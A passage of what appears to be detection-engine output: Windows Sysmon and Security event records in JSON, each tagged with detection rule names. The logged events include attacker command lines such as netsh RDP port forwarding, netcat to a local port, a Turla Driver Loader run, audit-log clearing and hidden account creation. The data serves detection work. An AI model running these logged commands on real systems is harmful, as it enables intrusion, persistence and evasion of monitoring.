(WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 
18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"spooler.exe payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 
17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 
17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 
1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 
04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver 
Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 
08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 
08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 
(WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution_attributes":{"ProcessID":2728,"ThreadID":3888},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution_attributes":{"ProcessID":5424,"ThreadID":5816},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-27 10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution_attributes":{"ProcessID":5400,"ThreadID":6548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["In-memory 
PowerShell"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution_attributes":{"ProcessID":1940,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User 
Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution_attributes":{"ProcessID":584,"ThreadID":752},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User 
Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution_attributes":{"ProcessID":584,"ThreadID":640},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 
20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 